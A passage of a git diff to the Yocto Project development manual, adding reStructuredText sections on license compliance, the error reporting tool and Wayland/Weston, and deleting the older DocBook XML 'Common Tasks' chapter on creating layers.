+   LICENSE_FLAGS_WHITELIST = "commercial"
+
+Specifying audio and video plugins as part of the
+``COMMERCIAL_AUDIO_PLUGINS`` and ``COMMERCIAL_VIDEO_PLUGINS`` statements
+(along with the enabling ``LICENSE_FLAGS_WHITELIST``) includes the
+plugins or components into built images, thus adding support for media
+formats or components.
+
+Maintaining Open Source License Compliance During Your Product's Lifecycle
+--------------------------------------------------------------------------
+
+One of the concerns for a development organization using open source
+software is how to maintain compliance with various open source
+licensing during the lifecycle of the product. While this section does
+not provide legal advice or comprehensively cover all scenarios, it does
+present methods that you can use to assist you in meeting the compliance
+requirements during a software release.
+
+With hundreds of different open source licenses that the Yocto Project
+tracks, it is difficult to know the requirements of each and every
+license. However, the requirements of the major FLOSS licenses can begin
+to be covered by assuming that three main areas of concern exist:
+
+-  Source code must be provided.
+
+-  License text for the software must be provided.
+
+-  Compilation scripts and modifications to the source code must be
+   provided.
+
+There are other requirements beyond the scope of these three and the
+methods described in this section (e.g. the mechanism through which
+source code is distributed).
+
+As different organizations have different methods of complying with open
+source licensing, this section is not meant to imply that there is only
+one single way to meet your compliance obligations, but rather to
+describe one method of achieving compliance. The remainder of this
+section describes methods supported to meet the previously mentioned
+three requirements. Once you take steps to meet these requirements, and
+prior to releasing images, sources, and the build system, you should
+audit all artifacts to ensure completeness.
+
+.. note::
+
+   The Yocto Project generates a license manifest during image creation
+   that is located in ``${DEPLOY_DIR}/licenses/``\ `image_name`\ ``-``\ `datestamp`
+   to assist with any audits.
+
+Providing the Source Code
+~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Compliance activities should begin before you generate the final image.
+The first thing you should look at is the requirement that tops the list
+for most compliance groups - providing the source. The Yocto Project has
+a few ways of meeting this requirement.
+
+One of the easiest ways to meet this requirement is to provide the
+entire :term:`DL_DIR` used by the
+build. This method, however, has a few issues. The most obvious is the
+size of the directory since it includes all sources used in the build
+and not just the source used in the released image. It will include
+toolchain source, and other artifacts, which you would not generally
+release. However, the more serious issue for most companies is
+accidental release of proprietary software. The Yocto Project provides
+an :ref:`archiver <ref-classes-archiver>` class to
+help avoid some of these concerns.
+
+Before you employ ``DL_DIR`` or the ``archiver`` class, you need to
+decide how you choose to provide source. The source ``archiver`` class
+can generate tarballs and SRPMs and can create them with various levels
+of compliance in mind.
+
+One way of doing this (but certainly not the only way) is to release
+just the source as a tarball. You can do this by adding the following to
+the ``local.conf`` file found in the
+:term:`Build Directory`:
+::
+
+   INHERIT += "archiver"
+   ARCHIVER_MODE[src] = "original"
+
+During the creation of your
+image, the source from all recipes that deploy packages to the image is
+placed within subdirectories of ``DEPLOY_DIR/sources`` based on the
+:term:`LICENSE` for each recipe.
+Releasing the entire directory enables you to comply with requirements
+concerning providing the unmodified source. It is important to note that
+the size of the directory can get large.
+
+A way to help mitigate the size issue is to only release tarballs for
+licenses that require the release of source. Let us assume you are only
+concerned with GPL code as identified by running the following script:
+
+.. code-block:: shell
+
+   # Script to archive a subset of packages matching specific license(s)
+   # Source and license files are copied into sub folders of package folder
+   # Must be run from build folder
+   #!/bin/bash
+   src_release_dir="source-release"
+   mkdir -p $src_release_dir
+   for a in tmp/deploy/sources/*; do
+      for d in $a/*; do
+         # Get package name from path
+         p=`basename $d`
+         p=${p%-*}
+         p=${p%-*}
+         # Only archive GPL packages (update *GPL* regex for your license check)
+         numfiles=`ls tmp/deploy/licenses/$p/*GPL* 2> /dev/null | wc -l`
+         if [ $numfiles -gt 1 ]; then
+            echo Archiving $p
+            mkdir -p $src_release_dir/$p/source
+            cp $d/* $src_release_dir/$p/source 2> /dev/null
+            mkdir -p $src_release_dir/$p/license
+            cp tmp/deploy/licenses/$p/* $src_release_dir/$p/license 2> /dev/null
+         fi
+      done
+   done
+
+At this point, you
+could create a tarball from the ``gpl_source_release`` directory and
+provide that to the end user. This method would be a step toward
+achieving compliance with section 3a of GPLv2 and with section 6 of
+GPLv3.
+
+Providing License Text
+~~~~~~~~~~~~~~~~~~~~~~
+
+One requirement that is often overlooked is inclusion of license text.
+This requirement also needs to be dealt with prior to generating the
+final image. Some licenses require the license text to accompany the
+binary. You can achieve this by adding the following to your
+``local.conf`` file:
+::
+
+   COPY_LIC_MANIFEST = "1"
+   COPY_LIC_DIRS = "1"
+   LICENSE_CREATE_PACKAGE = "1"
+
+Adding these statements to the
+configuration file ensures that the licenses collected during package
+generation are included on your image.
+
+.. note::
+
+   Setting all three variables to "1" results in the image having two
+   copies of the same license file. One copy resides in
+   ``/usr/share/common-licenses`` and the other resides in
+   ``/usr/share/license``.
+
+   The reason for this behavior is because
+   :term:`COPY_LIC_DIRS` and
+   :term:`COPY_LIC_MANIFEST`
+   add a copy of the license when the image is built but do not offer a
+   path for adding licenses for newly installed packages to an image.
+   :term:`LICENSE_CREATE_PACKAGE`
+   adds a separate package and an upgrade path for adding licenses to an
+   image.
+
+As the source ``archiver`` class has already archived the original
+unmodified source that contains the license files, you would have
+already met the requirements for inclusion of the license information
+with source as defined by the GPL and other open source licenses.
+
+Providing Compilation Scripts and Source Code Modifications
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+At this point, we have addressed all we need to prior to generating the
+image. The next two requirements are addressed during the final
+packaging of the release.
+
+By releasing the version of the OpenEmbedded build system and the layers
+used during the build, you will be providing both compilation scripts
+and the source code modifications in one step.
+
+If the deployment team has a :ref:`overview-manual/overview-manual-concepts:bsp layer`
+and a distro layer, and those
+those layers are used to patch, compile, package, or modify (in any way)
+any open source software included in your released images, you might be
+required to release those layers under section 3 of GPLv2 or section 1
+of GPLv3. One way of doing that is with a clean checkout of the version
+of the Yocto Project and layers used during your build. Here is an
+example:
+
+.. code-block:: shell
+
+   # We built using the dunfell branch of the poky repo
+   $ git clone -b dunfell git://git.yoctoproject.org/poky
+   $ cd poky
+   # We built using the release_branch for our layers
+   $ git clone -b release_branch git://git.mycompany.com/meta-my-bsp-layer
+   $ git clone -b release_branch git://git.mycompany.com/meta-my-software-layer
+   # clean up the .git repos
+   $ find . -name ".git" -type d -exec rm -rf {} \;
+
+One
+thing a development organization might want to consider for end-user
+convenience is to modify ``meta-poky/conf/bblayers.conf.sample`` to
+ensure that when the end user utilizes the released build system to
+build an image, the development organization's layers are included in
+the ``bblayers.conf`` file automatically:
+::
+
+   # POKY_BBLAYERS_CONF_VERSION is increased each time build/conf/bblayers.conf
+   # changes incompatibly
+   POKY_BBLAYERS_CONF_VERSION = "2"
+
+   BBPATH = "${TOPDIR}"
+   BBFILES ?= ""
+
+   BBLAYERS ?= " \
+     ##OEROOT##/meta \
+     ##OEROOT##/meta-poky \
+     ##OEROOT##/meta-yocto-bsp \
+     ##OEROOT##/meta-mylayer \
+     "
+
+Creating and
+providing an archive of the :term:`Metadata`
+layers (recipes, configuration files, and so forth) enables you to meet
+your requirements to include the scripts to control compilation as well
+as any modifications to the original source.
+
+Copying Licenses that Do Not Exist
+----------------------------------
+
+Some packages, such as the linux-firmware package, have many licenses
+that are not in any way common. You can avoid adding a lot of these
+types of common license files, which are only applicable to a specific
+package, by using the
+:term:`NO_GENERIC_LICENSE`
+variable. Using this variable also avoids QA errors when you use a
+non-common, non-CLOSED license in a recipe.
+
+The following is an example that uses the ``LICENSE.Abilis.txt`` file as
+the license from the fetched source:
+::
+
+   NO_GENERIC_LICENSE[Firmware-Abilis] = "LICENSE.Abilis.txt"
+
+Using the Error Reporting Tool
+==============================
+
+The error reporting tool allows you to submit errors encountered during
+builds to a central database. Outside of the build environment, you can
+use a web interface to browse errors, view statistics, and query for
+errors. The tool works using a client-server system where the client
+portion is integrated with the installed Yocto Project
+:term:`Source Directory` (e.g. ``poky``).
+The server receives the information collected and saves it in a
+database.
+
+A live instance of the error reporting server exists at
+https://errors.yoctoproject.org. This server exists so that when
+you want to get help with build failures, you can submit all of the
+information on the failure easily and then point to the URL in your bug
+report or send an email to the mailing list.
+
+.. note::
+
+   If you send error reports to this server, the reports become publicly
+   visible.
+
+Enabling and Using the Tool
+---------------------------
+
+By default, the error reporting tool is disabled. You can enable it by
+inheriting the
+:ref:`report-error <ref-classes-report-error>`
+class by adding the following statement to the end of your
+``local.conf`` file in your
+:term:`Build Directory`.
+::
+
+   INHERIT += "report-error"
+
+By default, the error reporting feature stores information in
+``${``\ :term:`LOG_DIR`\ ``}/error-report``.
+However, you can specify a directory to use by adding the following to
+your ``local.conf`` file:
+::
+
+   ERR_REPORT_DIR = "path"
+
+Enabling error
+reporting causes the build process to collect the errors and store them
+in a file as previously described. When the build system encounters an
+error, it includes a command as part of the console output. You can run
+the command to send the error file to the server. For example, the
+following command sends the errors to an upstream server:
+::
+
+   $ send-error-report /home/brandusa/project/poky/build/tmp/log/error-report/error_report_201403141617.txt
+
+In the previous example, the errors are sent to a public database
+available at https://errors.yoctoproject.org, which is used by the
+entire community. If you specify a particular server, you can send the
+errors to a different database. Use the following command for more
+information on available options:
+::
+
+   $ send-error-report --help
+
+When sending the error file, you are prompted to review the data being
+sent as well as to provide a name and optional email address. Once you
+satisfy these prompts, the command returns a link from the server that
+corresponds to your entry in the database. For example, here is a
+typical link: https://errors.yoctoproject.org/Errors/Details/9522/
+
+Following the link takes you to a web interface where you can browse,
+query the errors, and view statistics.
+
+Disabling the Tool
+------------------
+
+To disable the error reporting feature, simply remove or comment out the
+following statement from the end of your ``local.conf`` file in your
+:term:`Build Directory`.
+::
+
+   INHERIT += "report-error"
+
+Setting Up Your Own Error Reporting Server
+------------------------------------------
+
+If you want to set up your own error reporting server, you can obtain
+the code from the Git repository at :yocto_git:`/cgit/cgit.cgi/error-report-web/`.
+Instructions on how to set it up are in the README document.
+
+.. _dev-using-wayland-and-weston:
+
+Using Wayland and Weston
+========================
+
+`Wayland <https://en.wikipedia.org/wiki/Wayland_(display_server_protocol)>`__
+is a computer display server protocol that provides a method for
+compositing window managers to communicate directly with applications
+and video hardware and expects them to communicate with input hardware
+using other libraries. Using Wayland with supporting targets can result
+in better control over graphics frame rendering than an application
+might otherwise achieve.
+
+The Yocto Project provides the Wayland protocol libraries and the
+reference
+`Weston <https://en.wikipedia.org/wiki/Wayland_(display_server_protocol)#Weston>`__
+compositor as part of its release. You can find the integrated packages
+in the ``meta`` layer of the :term:`Source Directory`.
+Specifically, you
+can find the recipes that build both Wayland and Weston at
+``meta/recipes-graphics/wayland``.
+
+You can build both the Wayland and Weston packages for use only with
+targets that accept the `Mesa 3D and Direct Rendering
+Infrastructure <https://en.wikipedia.org/wiki/Mesa_(computer_graphics)>`__,
+which is also known as Mesa DRI. This implies that you cannot build and
+use the packages if your target uses, for example, the Intel Embedded
+Media and Graphics Driver (Intel EMGD) that overrides Mesa DRI.
+
+.. note::
+
+   Due to lack of EGL support, Weston 1.0.3 will not run directly on the
+   emulated QEMU hardware. However, this version of Weston will run
+   under X emulation without issues.
+
+This section describes what you need to do to implement Wayland and use
+the Weston compositor when building an image for a supporting target.
+
+Enabling Wayland in an Image
+----------------------------
+
+To enable Wayland, you need to enable it to be built and enable it to be
+included (installed) in the image.
+
+.. _enable-building:
+
+Building Wayland
+~~~~~~~~~~~~~~~~
+
+To cause Mesa to build the ``wayland-egl`` platform and Weston to build
+Wayland with Kernel Mode Setting
+(`KMS <https://wiki.archlinux.org/index.php/Kernel_Mode_Setting>`__)
+support, include the "wayland" flag in the
+:term:`DISTRO_FEATURES`
+statement in your ``local.conf`` file:
+::
+
+   DISTRO_FEATURES_append = " wayland"
+
+.. note::
+
+   If X11 has been enabled elsewhere, Weston will build Wayland with X11
+   support
+
+.. _enable-installation-in-an-image:
+
+Installing Wayland and Weston
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+To install the Wayland feature into an image, you must include the
+following
+:term:`CORE_IMAGE_EXTRA_INSTALL`
+statement in your ``local.conf`` file:
+::
+
+   CORE_IMAGE_EXTRA_INSTALL += "wayland weston"
+
+Running Weston
+--------------
+
+To run Weston inside X11, enabling it as described earlier and building
+a Sato image is sufficient. If you are running your image under Sato, a
+Weston Launcher appears in the "Utility" category.
+
+Alternatively, you can run Weston through the command-line interpretor
+(CLI), which is better suited for development work. To run Weston under
+the CLI, you need to do the following after your image is built:
+
+1. Run these commands to export ``XDG_RUNTIME_DIR``:
+   ::
+
+      mkdir -p /tmp/$USER-weston
+      chmod 0700 /tmp/$USER-weston
+      export XDG_RUNTIME_DIR=/tmp/$USER-weston
+
+2. Launch Weston in the shell:
+   ::
+
+      weston
diff --git a/documentation/dev-manual/dev-manual-common-tasks.xml b/documentation/dev-manual/dev-manual-common-tasks.xml
deleted file mode 100644
index e9ce182a59..0000000000
--- a/documentation/dev-manual/dev-manual-common-tasks.xml
+++ /dev/null
@@ -1,16022 +0,0 @@
-<!DOCTYPE chapter PUBLIC "-//OASIS//DTD DocBook XML V4.2//EN"
-"http://www.oasis-open.org/docbook/xml/4.2/docbookx.dtd"
-[<!ENTITY % poky SYSTEM "../poky.ent"> %poky; ] >
-
-<chapter id='extendpoky'>
-
-<title>Common Tasks</title>
-    <para>
-        This chapter describes fundamental procedures such as creating layers,
-        adding new software packages, extending or customizing images,
-        porting work to new hardware (adding a new machine), and so forth.
-        You will find that the procedures documented here occur often in the
-        development cycle using the Yocto Project.
-    </para>
-
-    <section id="understanding-and-creating-layers">
-        <title>Understanding and Creating Layers</title>
-
-        <para>
-            The OpenEmbedded build system supports organizing
-            <ulink url='&YOCTO_DOCS_REF_URL;#metadata'>Metadata</ulink> into
-            multiple layers.
-            Layers allow you to isolate different types of customizations from
-            each other.
-            For introductory information on the Yocto Project Layer Model,
-            see the
-            "<ulink url='&YOCTO_DOCS_OM_URL;#the-yocto-project-layer-model'>The Yocto Project Layer Model</ulink>"
-            section in the Yocto Project Overview and Concepts Manual.
-        </para>
-
-        <section id='creating-your-own-layer'>
-            <title>Creating Your Own Layer</title>
-
-            <para>
-                It is very easy to create your own layers to use with the
-                OpenEmbedded build system.
-                The Yocto Project ships with tools that speed up creating
-                layers.
-                This section describes the steps you perform by hand to create
-                layers so that you can better understand them.
-                For information about the layer-creation tools, see the
-                "<ulink url='&YOCTO_DOCS_BSP_URL;#creating-a-new-bsp-layer-using-the-bitbake-layers-script'>Creating a New BSP Layer Using the <filename>bitbake-layers</filename> Script</ulink>"
-                section in the Yocto Project Board Support Package (BSP)
-                Developer's Guide and the
-                "<link linkend='creating-a-general-layer-using-the-bitbake-layers-script'>Creating a General Layer Using the <filename>bitbake-layers</filename> Script</link>"
-                section further down in this manual.
-            </para>
-
-            <para>
-                Follow these general steps to create your layer without using
-                tools:
-                <orderedlist>
-                    <listitem><para>
-                        <emphasis>Check Existing Layers:</emphasis>
-                        Before creating a new layer, you should be sure someone
-                        has not already created a layer containing the Metadata
-                        you need.
-                        You can see the
-                        <ulink url='http://layers.openembedded.org/layerindex/layers/'>OpenEmbedded Metadata Index</ulink>
-                        for a list of layers from the OpenEmbedded community
-                        that can be used in the Yocto Project.
-                        You could find a layer that is identical or close to
-                        what you need.
-                        </para></listitem>
-                    <listitem><para>
-                        <emphasis>Create a Directory:</emphasis>
-                        Create the directory for your layer.
-                        When you create the layer, be sure to create the
-                        directory in an area not associated with the
-                        Yocto Project
-                        <ulink url='&YOCTO_DOCS_REF_URL;#source-directory'>Source Directory</ulink>
-                        (e.g. the cloned <filename>poky</filename> repository).
-                        </para>
-
-                        <para>While not strictly required, prepend the name of
-                        the directory with the string "meta-".
-                        For example:
-                        <literallayout class='monospaced'>
-     meta-mylayer
-     meta-GUI_xyz
-     meta-mymachine
-                        </literallayout>
-                        With rare exceptions, a layer's name follows this
-                        form:
-                        <literallayout class='monospaced'>
-     meta-<replaceable>root_name</replaceable>
-                        </literallayout>
-                        Following this layer naming convention can
-                        save you trouble later when tools, components, or
-                        variables "assume" your layer name begins with "meta-".
-                        A notable example is in configuration files as
-                        shown in the following step where layer names without
-                        the "meta-" string are appended
-                        to several variables used in the configuration.
-                        </para></listitem>
-                    <listitem><para id='dev-layer-config-file-description'>
-                        <emphasis>Create a Layer Configuration File:</emphasis>
-                        Inside your new layer folder, you need to create a
-                        <filename>conf/layer.conf</filename> file.
-                        It is easiest to take an existing layer configuration
-                        file and copy that to your layer's
-                        <filename>conf</filename> directory and then modify the
-                        file as needed.</para>
-
-                        <para>The
-                        <filename>meta-yocto-bsp/conf/layer.conf</filename> file
-                        in the Yocto Project
-                        <ulink url='&YOCTO_GIT_URL;/cgit/cgit.cgi/poky/tree/meta-yocto-bsp/conf'>Source Repositories</ulink>
-                        demonstrates the required syntax.
-                        For your layer, you need to replace "yoctobsp" with
-                        a unique identifier for your layer (e.g. "machinexyz"
-                        for a layer named "meta-machinexyz"):
-                        <literallayout class='monospaced'>
-     # We have a conf and classes directory, add to BBPATH
-     BBPATH .= ":${LAYERDIR}"
-
-     # We have recipes-* directories, add to BBFILES
-     BBFILES += "${LAYERDIR}/recipes-*/*/*.bb \
-                 ${LAYERDIR}/recipes-*/*/*.bbappend"
-
-     BBFILE_COLLECTIONS += "yoctobsp"
-     BBFILE_PATTERN_yoctobsp = "^${LAYERDIR}/"
-     BBFILE_PRIORITY_yoctobsp = "5"
-     LAYERVERSION_yoctobsp = "4"
-     LAYERSERIES_COMPAT_yoctobsp = "&DISTRO_NAME_NO_CAP;"
-                        </literallayout>
-                        Following is an explanation of the layer configuration
-                        file:
-                        <itemizedlist>
-                            <listitem><para>
-                                <ulink url='&YOCTO_DOCS_REF_URL;#var-BBPATH'><filename>BBPATH</filename></ulink>:
-                                Adds the layer's root directory to BitBake's
-                                search path.
-                                Through the use of the
-                                <filename>BBPATH</filename> variable, BitBake
-                                locates class files
-                                (<filename>.bbclass</filename>),
-                                configuration files, and files that are
-                                included with <filename>include</filename> and
-                                <filename>require</filename> statements.
-                                For these cases, BitBake uses the first file
-                                that matches the name found in
-                                <filename>BBPATH</filename>.
-                                This is similar to the way the
-                                <filename>PATH</filename> variable is used for
-                                binaries.
-                                It is recommended, therefore, that you use
-                                unique class and configuration filenames in
-                                your custom layer.
-                                </para></listitem>
-                            <listitem><para>
-                                <ulink url='&YOCTO_DOCS_REF_URL;#var-BBFILES'><filename>BBFILES</filename></ulink>:
-                                Defines the location for all recipes in the
-                                layer.
-                                </para></listitem>
-                            <listitem><para>
-                                <ulink url='&YOCTO_DOCS_REF_URL;#var-BBFILE_COLLECTIONS'><filename>BBFILE_COLLECTIONS</filename></ulink>:
-                                Establishes the current layer through a
-                                unique identifier that is used throughout the
-                                OpenEmbedded build system to refer to the layer.
-                                In this example, the identifier "yoctobsp" is
-                                the representation for the container layer
-                                named "meta-yocto-bsp".
-                                </para></listitem>
-                            <listitem><para>
-                                <ulink url='&YOCTO_DOCS_REF_URL;#var-BBFILE_PATTERN'><filename>BBFILE_PATTERN</filename></ulink>:
-                                Expands immediately during parsing to
-                                provide the directory of the layer.
-                                </para></listitem>
-                            <listitem><para>
-                                <ulink url='&YOCTO_DOCS_REF_URL;#var-BBFILE_PRIORITY'><filename>BBFILE_PRIORITY</filename></ulink>:
-                                Establishes a priority to use for
-                                recipes in the layer when the OpenEmbedded build
-                                finds recipes of the same name in different
-                                layers.
-                                </para></listitem>
-                            <listitem><para>
-                                <ulink url='&YOCTO_DOCS_REF_URL;#var-LAYERVERSION'><filename>LAYERVERSION</filename></ulink>:
-                                Establishes a version number for the layer.
-                                You can use this version number to specify this
-                                exact version of the layer as a dependency when
-                                using the
-                                <ulink url='&YOCTO_DOCS_REF_URL;#var-LAYERDEPENDS'><filename>LAYERDEPENDS</filename></ulink>
-                                variable.
-                                </para></listitem>
-                            <listitem><para>
-                                <ulink url='&YOCTO_DOCS_REF_URL;#var-LAYERDEPENDS'><filename>LAYERDEPENDS</filename></ulink>:
-                                Lists all layers on which this layer depends (if any).
-                                </para></listitem>
-                            <listitem><para>
-                                <ulink url='&YOCTO_DOCS_REF_URL;#var-LAYERSERIES_COMPAT'><filename>LAYERSERIES_COMPAT</filename></ulink>:
-                                Lists the
-                                <ulink url='&YOCTO_WIKI_URL;/wiki/Releases'>Yocto Project</ulink>
-                                releases for which the current version is
-                                compatible.
-                                This variable is a good way to indicate if
-                                your particular layer is current.
-                                </para></listitem>
-                        </itemizedlist>
-                        </para></listitem>
-                    <listitem><para>
-                        <emphasis>Add Content:</emphasis>
-                        Depending on the type of layer, add the content.
-                        If the layer adds support for a machine, add the machine
-                        configuration in a <filename>conf/machine/</filename>
-                        file within the layer.
-                        If the layer adds distro policy, add the distro
-                        configuration in a <filename>conf/distro/</filename>
-                        file within the layer.
-                        If the layer introduces new recipes, put the recipes
-                        you need in <filename>recipes-*</filename>
-                        subdirectories within the layer.
-                        <note>
-                            For an explanation of layer hierarchy that
-                            is compliant with the Yocto Project, see
-                            the
-                            "<ulink url='&YOCTO_DOCS_BSP_URL;#bsp-filelayout'>Example Filesystem Layout</ulink>"
-                            section in the Yocto Project Board
-                            Support Package (BSP) Developer's Guide.
-                        </note>
-                        </para></listitem>
-                    <listitem><para>
-                        <emphasis>Optionally Test for Compatibility:</emphasis>
-                        If you want permission to use the Yocto Project
-                        Compatibility logo with your layer or application that
-                        uses your layer, perform the steps to apply for
-                        compatibility.
-                        See the
-                        "<link linkend='making-sure-your-layer-is-compatible-with-yocto-project'>Making Sure Your Layer is Compatible With Yocto Project</link>"
-                        section for more information.
-                        </para></listitem>
-                </orderedlist>
-            </para>
-        </section>
-
-        <section id='best-practices-to-follow-when-creating-layers'>
-            <title>Following Best Practices When Creating Layers</title>
-
-            <para>
-                To create layers that are easier to maintain and that will
-                not impact builds for other machines, you should consider the
-                information in the following list:
-                <itemizedlist>
-                    <listitem><para>
-                        <emphasis>Avoid "Overlaying" Entire Recipes from Other Layers in Your Configuration:</emphasis>
-                        In other words, do not copy an entire recipe into your
-                        layer and then modify it.
-                        Rather, use an append file
-                        (<filename>.bbappend</filename>) to override only those
-                        parts of the original recipe you need to modify.
-                        </para></listitem>
-                    <listitem><para>
-                        <emphasis>Avoid Duplicating Include Files:</emphasis>
-                        Use append files (<filename>.bbappend</filename>)
-                        for each recipe that uses an include file.
-                        Or, if you are introducing a new recipe that requires
-                        the included file, use the path relative to the
-                        original layer directory to refer to the file.
-                        For example, use
-                        <filename>require recipes-core/</filename><replaceable>package</replaceable><filename>/</filename><replaceable>file</replaceable><filename>.inc</filename>
-                        instead of
-                        <filename>require </filename><replaceable>file</replaceable><filename>.inc</filename>.
-                        If you're finding you have to overlay the include file,
-                        it could indicate a deficiency in the include file in
-                        the layer to which it originally belongs.
-                        If this is the case, you should try to address that
-                        deficiency instead of overlaying the include file.
-                        For example, you could address this by getting the
-                        maintainer of the include file to add a variable or
-                        variables to make it easy to override the parts needing
-                        to be overridden.
-                        </para></listitem>
-                    <listitem><para>
-                        <emphasis>Structure Your Layers:</emphasis>
-                        Proper use of overrides within append files and
-                        placement of machine-specific files within your layer
-                        can ensure that a build is not using the wrong Metadata
-                        and negatively impacting a build for a different
-                        machine.
-                        Following are some examples:
-                        <itemizedlist>
-                            <listitem><para>
-                                <emphasis>Modify Variables to Support a
-                                Different Machine:</emphasis>
-                                Suppose you have a layer named
-                                <filename>meta-one</filename> that adds support
-                                for building machine "one".
-                                To do so, you use an append file named
-                                <filename>base-files.bbappend</filename> and
-                                create a dependency on "foo" by altering the
-                                <ulink url='&YOCTO_DOCS_REF_URL;#var-DEPENDS'><filename>DEPENDS</filename></ulink>
-                                variable:
-                                <literallayout class='monospaced'>
-     DEPENDS = "foo"
-                                </literallayout>
-                                The dependency is created during any build that
-                                includes the layer
-                                <filename>meta-one</filename>.
-                                However, you might not want this dependency
-                                for all machines.
-                                For example, suppose you are building for
-                                machine "two" but your
-                                <filename>bblayers.conf</filename> file has the
-                                <filename>meta-one</filename> layer included.
-                                During the build, the
-                                <filename>base-files</filename> for machine
-                                "two" will also have the dependency on
-                                <filename>foo</filename>.</para>
-                                <para>To make sure your changes apply only when
-                                building machine "one", use a machine override
-                                with the <filename>DEPENDS</filename> statement:
-                                <literallayout class='monospaced'>
-     DEPENDS_one = "foo"
-                                </literallayout>
-                                You should follow the same strategy when using
-                                <filename>_append</filename> and
-                                <filename>_prepend</filename> operations:
-                                <literallayout class='monospaced'>
-     DEPENDS_append_one = " foo"
-     DEPENDS_prepend_one = "foo "
-                                </literallayout>
-                                As an actual example, here's a snippet from the
-                                generic kernel include file
-                                <filename>linux-yocto.inc</filename>,
-                                wherein the kernel compile and link options are
-                                adjusted in the case of a subset of the supported
-                                architectures:
-                                <literallayout class='monospaced'>
-     DEPENDS_append_aarch64 = " libgcc"
-     KERNEL_CC_append_aarch64 = " ${TOOLCHAIN_OPTIONS}"
-     KERNEL_LD_append_aarch64 = " ${TOOLCHAIN_OPTIONS}"
-
-     DEPENDS_append_nios2 = " libgcc"
-     KERNEL_CC_append_nios2 = " ${TOOLCHAIN_OPTIONS}"
-     KERNEL_LD_append_nios2 = " ${TOOLCHAIN_OPTIONS}"
-
-     DEPENDS_append_arc = " libgcc"
-     KERNEL_CC_append_arc = " ${TOOLCHAIN_OPTIONS}"
-     KERNEL_LD_append_arc = " ${TOOLCHAIN_OPTIONS}"
-
-     KERNEL_FEATURES_append_qemuall=" features/debug/printk.scc"
-                                </literallayout>
-                                <note>
-                                    Avoiding "+=" and "=+" and using
-                                    machine-specific
-                                    <filename>_append</filename>
-                                    and <filename>_prepend</filename> operations
-                                    is recommended as well.
-                                </note>
-                                </para></listitem>
-                            <listitem><para>
-                                <emphasis>Place Machine-Specific Files in
-                                Machine-Specific Locations:</emphasis>
-                                When you have a base recipe, such as
-                                <filename>base-files.bb</filename>, that
-                                contains a
-                                <ulink url='&YOCTO_DOCS_REF_URL;#var-SRC_URI'><filename>SRC_URI</filename></ulink>
-                                statement to a file, you can use an append file
-                                to cause the build to use your own version of
-                                the file.
-                                For example, an append file in your layer at
-                                <filename>meta-one/recipes-core/base-files/base-files.bbappend</filename>
-                                could extend
-                                <ulink url='&YOCTO_DOCS_REF_URL;#var-FILESPATH'><filename>FILESPATH</filename></ulink>
-                                using
-                                <ulink url='&YOCTO_DOCS_REF_URL;#var-FILESEXTRAPATHS'><filename>FILESEXTRAPATHS</filename></ulink>
-                                as follows:
-                                <literallayout class='monospaced'>
-     FILESEXTRAPATHS_prepend := "${THISDIR}/${BPN}:"
-                                </literallayout>
-                                The build for machine "one" will pick up your
-                                machine-specific file as long as you have the
-                                file in
-                                <filename>meta-one/recipes-core/base-files/base-files/</filename>.
-                                However, if you are building for a different
-                                machine and the
-                                <filename>bblayers.conf</filename> file includes
-                                the <filename>meta-one</filename> layer and
-                                the location of your machine-specific file is
-                                the first location where that file is found
-                                according to <filename>FILESPATH</filename>,
-                                builds for all machines will also use that
-                                machine-specific file.</para>
-                                <para>You can make sure that a machine-specific
-                                file is used for a particular machine by putting
-                                the file in a subdirectory specific to the
-                                machine.
-                                For example, rather than placing the file in
-                                <filename>meta-one/recipes-core/base-files/base-files/</filename>
-                                as shown above, put it in
-                                <filename>meta-one/recipes-core/base-files/base-files/one/</filename>.
-                                Not only does this make sure the file is used
-                                only when building for machine "one", but the
-                                build process locates the file more quickly.</para>
-                                <para>In summary, you need to place all files
-                                referenced from <filename>SRC_URI</filename>
-                                in a machine-specific subdirectory within the
-                                layer in order to restrict those files to
-                                machine-specific builds.
-                                </para></listitem>
-                        </itemizedlist>
-                        </para></listitem>
-                    <listitem><para>
-                        <emphasis>Perform Steps to Apply for Yocto Project Compatibility:</emphasis>
-                        If you want permission to use the
-                        Yocto Project Compatibility logo with your layer
-                        or application that uses your layer, perform the
-                        steps to apply for compatibility.
-                        See the
-                        "<link linkend='making-sure-your-layer-is-compatible-with-yocto-project'>Making Sure Your Layer is Compatible With Yocto Project</link>"
-                        section for more information.
-                        </para></listitem>
-                    <listitem><para>
-                        <emphasis>Follow the Layer Naming Convention:</emphasis>
-                        Store custom layers in a Git repository that use the
-                        <filename>meta-<replaceable>layer_name</replaceable></filename>
-                        format.
-                        </para></listitem>
-                    <listitem><para>
-                        <emphasis>Group Your Layers Locally:</emphasis>
-                        Clone your repository alongside other cloned
-                        <filename>meta</filename> directories from the
-                        <ulink url='&YOCTO_DOCS_REF_URL;#source-directory'>Source Directory</ulink>.
-                        </para></listitem>
-                </itemizedlist>
-            </para>
-        </section>
-
-        <section id='making-sure-your-layer-is-compatible-with-yocto-project'>
-            <title>Making Sure Your Layer is Compatible With Yocto Project</title>
-
-            <para>
-                When you create a layer used with the Yocto Project, it is
-                advantageous to make sure that the layer interacts well with
-                existing Yocto Project layers (i.e. the layer is compatible
-                with the Yocto Project).
-                Ensuring compatibility makes the layer easy to be consumed
-                by others in the Yocto Project community and could allow you
-                permission to use the Yocto Project Compatible Logo.
-                <note>
-                    Only Yocto Project member organizations are permitted to
-                    use the Yocto Project Compatible Logo.
-                    The logo is not available for general use.
-                    For information on how to become a Yocto Project member
-                    organization, see the
-                    <ulink url='&YOCTO_HOME_URL;'>Yocto Project Website</ulink>.
-                </note>
-            </para>
-
-            <para>
-                The Yocto Project Compatibility Program consists of a layer
-                application process that requests permission to use the Yocto
-                Project Compatibility Logo for your layer and application.
-                The process consists of two parts:
-                <orderedlist>
-                    <listitem><para>
-                        Successfully passing a script
-                        (<filename>yocto-check-layer</filename>) that
-                        when run against your layer, tests it against
-                        constraints based on experiences of how layers have
-                        worked in the real world and where pitfalls have been
-                        found.
-                        Getting a "PASS" result from the script is required for
-                        successful compatibility registration.
-                        </para></listitem>
-                    <listitem><para>
-                        Completion of an application acceptance form, which
-                        you can find at
-                        <ulink url='https://www.yoctoproject.org/webform/yocto-project-compatible-registration'></ulink>.
-                        </para></listitem>
-                </orderedlist>
-            </para>
-
-            <para>
-                To be granted permission to use the logo, you need to satisfy
-                the following:
-                <itemizedlist>
